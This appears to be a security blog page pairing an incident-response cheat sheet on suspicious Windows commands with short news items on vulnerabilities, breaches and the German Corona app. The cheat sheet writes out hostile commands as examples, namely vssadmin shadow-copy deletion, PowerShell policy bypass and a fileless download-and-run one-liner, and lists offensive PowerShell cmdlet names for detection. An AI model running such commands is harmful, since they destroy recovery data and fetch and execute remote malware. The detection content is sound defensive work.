legal contact
 

Cybernews and other cool stuff

Nach Tags filtern: data emotet forensic learning list training trickbotatm attackbank heist blockbtleakschina enisafeedforensichowtoioclaw-enforcementleaklinuxmisposintrothsecuritysigmasophostortwitterwindows

malicous commands for the incident response

What is actually always suspicious / evil:

See also: ​day-2-for508-2.html​​​


cmd.exe outside of C:\windows\system32 or c:\windows

* .exe, * .com, * .vbs, * .bat, * .dll - calls in "world writable" directories such as:

\ tmp, \ temp \, \ Users \ *, C: \ Users \ YourUserName \ Roaming, C: \ Users \ YourUserName \ Local, C: \ Users \ YourUserName \ LocalLow

Calls to fake system programs that are in the wrong place. The correct locations are as follows. Do you see a call from another directory, please:

  • Have a RAM and HDD snapshot created.
  • Contact the person responsible (or caller) and check the legitimacy of the action
  • Possibly. Isolate the called program and throw it into the SandBox
  • Possibly. Check IOCs from the SandBox in MISP and TheHive
  • Possibly. Have the machine isolated / disconnected from the network
  • Possibly. initiate forensic analysis

The above also applies in the opposite case that these programs are accessed for writing / changing outside of an update.

  • Image Path: N/A for system.exe – Not generated from an executable image
  • Parent Process: None
  • Number of Instances: One


  • Image Path: %SystemRoot%\System32\smss.exe
  • Parent Process: System
  • Number of Instances: One master instance and another child instance per session. Children exit after creating their session


  • Image Path: %SystemRoot%\System32\wininit.exe
  • Parent Process: Created by an instance of smss.exe that exits, so tools usually do not provide the parent process name.
  • Number of Instances: One


  • Image Path: %SystemRoot%\System32\RuntimeBroker.exe
  • Parent Process: svchost.exe
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\taskhostw.exe
  • Parent Process: svchost.exe
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\winlogon.exe
  • Parent Process: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\csrss.exe
  • Parent Process: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: Two or more


  • Image Path: %SystemRoot%\System32\services.exe
  • Parent Process: wininit.exe
  • Number of Instances: One


  • Image Path: %SystemRoot%\system32\svchost.exe
  • Parent Process: services.exe (most often)
  • Number of Instances: Many (generally at least 10)


  • Image Path: %SystemRoot%\System32\lsaiso.exe
  • Parent Process: wininit.exe
  • Number of Instances: Zero or one
  • Image Path: %SystemRoot%\System32\lsass.exe
  • Parent Process: wininit.exe
  • Number of Instances: One


  • Image Path: %SystemRoot%\explorer.exe
  • Parent Process: Created by an instance of userinit.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: One or more per interactively logged-on user


Clearing the chance of evidence recognition

"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet


Powershell

Bypass PS-internal security controls by executing PS and give the script to call as parameter.

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy bypass -File "C:\windows\system32\evil.ps1"


Execute other then PS1-files:

powershell.exe –ep Bypass “& {Get-Content .\malware.ps2 | iex}


Executing directly into memory (file-less attack)

powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient).DownloadString(‘https://[website]/malware.ps1′))


Detect Commandlet names from well-known PowerShell exploitation frameworks


- "*Invoke-DllInjection*"
- "*Invoke-Shellcode*"
- "*Invoke-WmiCommand*"
- "*Get-GPPPassword*"
- "*Get-Keystrokes*"
- "*Get-TimedScreenshot*"
- "*Get-VaultCredential*"
- "*Invoke-CredentialInjection*"
- "*Invoke-Mimikatz*"
- "*Invoke-NinjaCopy*"
- "*Invoke-TokenManipulation*"
- "*Out-Minidump*"
- "*VolumeShadowCopyTools*"
- "*Invoke-ReflectivePEInjection*"
- "*Invoke-UserHunter*"
- "*Find-GPOLocation*"
- "*Invoke-ACLScanner*"
- "*Invoke-DowngradeAccount*"
- "*Get-ServiceUnquoted*"
- "*Get-ServiceFilePermission*"
- "*Get-ServicePermission*"
- "*Invoke-ServiceAbuse*"
- "*Install-ServiceBinary*"
- "*Get-RegAutoLogon*"
- "*Get-VulnAutoRun*"
- "*Get-VulnSchTask*"
- "*Get-UnattendedInstallFile*"
- "*Get-ApplicationHost*"
- "*Get-RegAlwaysInstallElevated*"
- "*Get-Unconstrained*"
- "*Add-RegBackdoor*"
- "*Add-ScrnSaveBackdoor*"
- "*Gupt-Backdoor*"
- "*Invoke-ADSBackdoor*"
- "*Enabled-DuplicateToken*"
- "*Invoke-PsUaCme*"
- "*Remove-Update*"
- "*Check-VM*"
- "*Get-LSASecret*"
- "*Get-PassHashes*"
- "*Show-TargetScreen*"
- "*Port-Scan*"
- "*Invoke-PoshRatHttp*"
- "*Invoke-PowerShellTCP*"
- "*Invoke-PowerShellWMI*"
- "*Add-Exfiltration*"
- "*Add-Persistence*"
- "*Do-Exfiltration*"
- "*Start-CaptureServer*"
- "*Get-ChromeDump*"
- "*Get-ClipboardContents*"
- "*Get-FoxDump*"
- "*Get-IndexedItem*"
- "*Get-Screenshot*"
- "*Invoke-Inveigh*"
- "*Invoke-NetRipper*"
- "*Invoke-EgressCheck*"
- "*Invoke-PostExfil*"
- "*Invoke-PSInject*"
- "*Invoke-RunAs*"
- "*MailRaider*"
- "*New-HoneyHash*"
- "*Set-MacAttribute*"
- "*Invoke-DCSync*"
- "*Invoke-PowerDump*"
- "*Exploit-Jboss*"
- "*Invoke-ThunderStruck*"
- "*Invoke-VoiceTroll*"
- "*Set-Wallpaper*"
- "*Invoke-InveighRelay*"
- "*Invoke-PsExec*"
- "*Invoke-SSHCommand*"
- "*Get-SecurityPackages*"
- "*Install-SSP*"
- "*Invoke-BackdoorLNK*"
- "*PowerBreach*"
- "*Get-SiteListPassword*"
- "*Get-System*"
- "*Invoke-BypassUAC*"
- "*Invoke-Tater*"
- "*Invoke-WScriptBypassUAC*"
- "*PowerUp*"
- "*PowerView*"
- "*Get-RickAstley*"
- "*Find-Fruit*"
- "*HTTP-Login*"
- "*Find-TrustedDocuments*"
- "*Invoke-Paranoia*"
- "*Invoke-WinEnum*"
- "*Invoke-ARPScan*"
- "*Invoke-PortScan*"
- "*Invoke-ReverseDNSLookup*"
- "*Invoke-SMBScanner*"
- "*Invoke-Mimikittenz*"
- "*Invoke-AllChecks*"
false_positives:
- Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1


Exploiting iMessage: The Remote, Interaction-less Attack Surface of

Natalie Silvanovich AKA natashenka from Project-Zero published an extremly interesting slide deck of the exploitation of the iPhone.

While vuln's and exploits of iPhones are quite rare anyway, this is surly worth having a look.

Check out: Googles Project Zero

I'm Open Sourcing the Have I Been Pwned Code Base

The well known service of "have i been pwned" is making hist sourcecode open source.

Troy Hunt published a statement where he said that the sourcecode (excluding the databases) will become open source.

Thanks Troy for that step...!!!


Unknown hackers fight back Emotet

First reported by ZDNet:

A vigilante is sabotaging the Emotet botnet by replacing malware payloads with GIFs

An unknown vigilante hacker has been sabotaging the operations of the recently-revived Emotet botnet by replacing Emotet payloads with animated GIFs, effectively preventing victims from getting infected.

The sabotage, which started three days ago, on July 21, has grown from a simple joke to a serious issue impacting a large portion of the Emotet operation.

According to Cryptolaemus, a group of white-hat security researchers tracking the Emotet botnet, the vigilante is now poisoning around a quarter of all Emotet's payload downloads.


JSOF: Ripple20 aka Treck

JSOF published a scary fact of many embedded TCP/IP-stacks offer a vulnerability of missing sanitisation that allows a buffer overflow and a RCE.

From JSOF:

Ripple20 reached critical IoT devices from a wide range of fields, involving a diverse group of vendors. Affected vendors range from one-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel,  Rockwell Automation, Caterpillar, Baxter, as well as many other major international vendors suspected of being of vulnerable in medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries.

A detailed technical report of two of the vulnerabilities and their exploitation can be found in the CVE-2020-11896/CVE-2020-11898 whitepaper

JSOF will be providing scripts for the identification of products running Treck upon request.
For more information or requests please contact: Ripple20@jsof-tech.com

Fix: install vendor patches

Mitigation: implement the IDS/IPS (suricata) rule from CERT.CC and check at the CERT.CC page if your system is known to be afected. (CISCO ASR5xxx)

Vulnerabilities include:

CVE-2020-11896 CVE-2020-11897 CVE-2020-11898 CVE-2020-11899 CVE-2020-11900 CVE-2020-11901 CVE-2020-11902 CVE-2020-11903 CVE-2020-11904 CVE-2020-11905 CVE-2020-11906 CVE-2020-11907 CVE-2020-11908 CVE-2020-11909 CVE-2020-11910 CVE-2020-11911 CVE-2020-11912 CVE-2020-11913 CVE-2020-11914


GRUB2 - BootHole (CVE-2020-10713)

Eclypsium discovered a buffer overflow within the boot loader grub2 that can be used as a persistence machanism. By the way of the need to modify the grub.cfg file, the attacked needs to have elevated rights. 

In the course of Eclypsium’s analysis, we have identified a buffer overflow vulnerability in the way that GRUB2 parses content from the GRUB2 config file (grub.cfg).


KillChain: "persistence"

Such an attack would require an attacker to have elevated privileges. However, it would provide the attacker with a powerful additional escalation of privilege and persistence on the device, even with Secure Boot enabled and properly performing signature verification on all loaded executables.

Risk: medium

Mitigation/Fix: revoke the UEFI certs and install vendors patches.

Caution, as RedHat had feedback that a lot of machines had issues booting after applying theit patch.



Cloudflare outage on July 17, 2020


John Graham-Cummig

Today a configuration error in our backbone network caused an outage for Internet properties and Cloudflare services that lasted 27 minutes. We saw traffic drop by about 50% across our network. Because of the architecture of our backbone this outage didn’t affect the entire Cloudflare network and was localized to certain geographies.

The outage occurred because, while working on an unrelated issue with a segment of the backbone from Newark to Chicago, our network engineering team updated the configuration on a router in Atlanta to alleviate congestion. This configuration contained an error that caused all traffic across our backbone to be sent to Atlanta. This quickly overwhelmed the Atlanta router and caused Cloudflare network locations connected to the backbone to fail.

The affected locations were San Jose, Dallas, Seattle, Los Angeles, Chicago, Washington, DC, Richmond, Newark, Atlanta, London, Amsterdam, Frankfurt, Paris, Stockholm, Moscow, St. Petersburg, São Paulo, Curitiba, and Porto Alegre. Other locations continued to operate normally.

For the avoidance of doubt: this was not caused by an attack or breach of any kind.

We are sorry for this outage and have already made a global change to the backbone configuration that will prevent it from being able to occur again.



Sourceode of german Corona-App published for personal review

For those who do not trust the app are now able to review the apps sourcode.

Check this GitHub for the source.

German police using corona data for investigations

Did you know that the german police is using the contact lists that everybody has to fill out, when i.e. eating in a restaurant, for their investigations?

As per the State Criminal Police Office (LKA), this is possible by using "investigations of any kind" ("Ermittlungen jedweglicher Art"), even if the used data was not intentionally ment to be used for such use.

Scary to me ...



German BKA can read WhatsApp conversations

The German Fedaral Criminal Police Office (BKA) is able to read WhatApp conversations. Although with a quite high effort, but presumably by using the Web-function.

Check the official news article (in german) at the "tagsschau.de"

‘Meow’ attack has deleted almost 4,000 unsecured databases

Things change. While silently taking the data from unsecured databases found, they are now also deleted. At least the owners are now fronted with the effect of leaving (personal) data unsecured.

Check "BLEEPINGCOMPUTER" for the original article.


Finally: The German Version of the "Corona App" is out

After the first Corona lock-down is almost over, the germans also have their app.
I will not suggest you to use or not to use this tool, but from my opinion, the app has nothing to do with conspiracy or state control. But this is just my personal view.

 

Play with real IPv6 /48 at Hurricane Electric

Get yourself a /48 IPv6 tunnel (65535 times a /64) at Hurricane Electric and prove your IPv6 capabilities with a free exam.

SMBGhost Exploit PoC

"chompie1337" is giving us a PoC for the SMBGhost vulnerability to test System in your Environment.

Even if not used to actively test your Systems (bluescreen posibility), it's an excellent Chance to learn more About the "ghost of SMB3".

 

SMBGhost_RCE_PoC

RCE PoC for CVE-2020-0796 "SMBGhost"

For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die.

Now that that's out of the way....

Windows Security Alert: Core System File Zero-Days Confirmed Unpatched


Davey Winder Senior Contributor is reporting about 4 new 0-Days at Forbes

A core Windows system file called splwow64.exe, which is a printer driver host for 32-bit apps. The Spooler Windows OS (Windows 64-bit) executable enables 32-bit applications to be compatible with a 64-bit Windows system. CVE-2020-0915CVE-2020-0916 and CVE-2020-0986 all impact that splwow64 Windows system file. All three are classified as high on the CVE severity scoring system with a 7.0 rating.
[…]
The last of the zero-day vulnerabilities publicly disclosed by ZDI does not have a CVE number, only a ZDI one of ZDI-20-666. This is another privilege escalation vulnerability, but this time within the handling of WLAN connection profiles. An attacker would have to create a malicious profile that would then enable them to disclose credentials for that computer account, which can then be leveraged in an exploit. Although also rated high by ZDI, this vulnerability was not determined to be severe enough for fixing "in the current version" by Microsoft, which closed the case without providing a patch.

ID action mitigation risk - "priv. escalation"
CVE-2020-0915
ZDI-20-662 
 The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to disclose information from low integrity in the context of the current user at medium integrity.  Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it.  This vulnerability allows local attackers to disclose information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

CVE-2020-0986
 ZDI-20-663
 The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to disclose information from low integrity in the context of the current user at medium integrity.  Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it.  This vulnerability allows local attackers to disclose information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
CVE-2020-0915
ZDI-20-664
The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to disclose information from low integrity in the context of the current user at medium integrity. Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This vulnerability allows local attackers to disclose information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

CVE-2020-0916
ZDI-20-665

The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to disclose information from low integrity in the context of the current user at medium integrity. Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This vulnerability allows local attackers to disclose information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
ZDI-20-666 The specific flaw exists within the handling of WLAN connection profiles. By creating a malicious profile, an attacker can disclose credentials for the machine account. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of an administrator. Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it.


This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.


Apple releases iOS 13.5 to the public with Exposure Notification API, Face ID enhancements, more

Probe opened after mosques blare ‘Bella Ciao’ from minarets in Turkey’s west

The Italian resistance song "Belly Ciao" (in a Turkish version) was broadcasted from several mosques in the Izmir area on May 21st 2020, the Hurriyet reported.

İzmir Provincial Religious Directorate initially denied reports of such a broadcast by issuing a statement on its social media account, however, it later removed this post.

“According to our initial analysis, unidentified people sabotaged our central adhan [call to prayer] system in an illegal way,” the directorate said in a second statement.

Sourcecode: Corona-Warn-App Server

SAP is sharing it's alpha-state code of the Corona-Warn-App that might be made available for Germany. Have a look at the code and find out what and how it does with your personal data.

The goal of this project is to develop the official Corona-Warn-App for Germany based on the exposure notification API from Apple and Google. The apps (for both iOS and Android) use Bluetooth technology to exchange anonymous encrypted data with other mobile phones (on which the app is also installed) in the vicinity of an app user's phone. The data is stored locally on each user's device, preventing authorities or other parties from accessing or controlling the data. This repository contains the implementation of the server for encryption keys for the Corona-Warn-App. This implementation is still a work in progress, and the code it contains is currently alpha-quality code.

BIAS: Bluetooth Impersonation AttackS

Daniele Antoniole, Nils Ole Tippenhauer and Kasper Rasmussenhave discovered a flaw within the BT stack that allows an attacker to fake an already authenticated (paired) connection to be established with a new device by sniffing the traffic between two devices in the pairing process.

So be careful when pairing devices while sitting at public places. The sniffed data could be used to pair an unknown device without your knowledge as well.

 

 

 

easyJet Loses 9 Million Customers’ Data To Hackers

Our investigation found that the email address and travel details of approximately 9 million customers were accessed. These affected customers will be contacted in the next few days. If you are not contacted then your information has not been accessed.  Other than as referenced in the following paragraph, passport details and credit card details of these customers were not accessed. 

[…]

There is no evidence that any personal information of any nature has been misused, however, on the recommendation of the ICO, we are communicating with the approximately 9 million customers whose travel details were accessed to advise them of protective steps to minimise any risk of potential phishing.  We are advising customers to continue to be alert as they would normally be, especially should they receive any unsolicited communications. We also advise customers to be cautious of any communications purporting to come from easyJet or easyJet Holidays.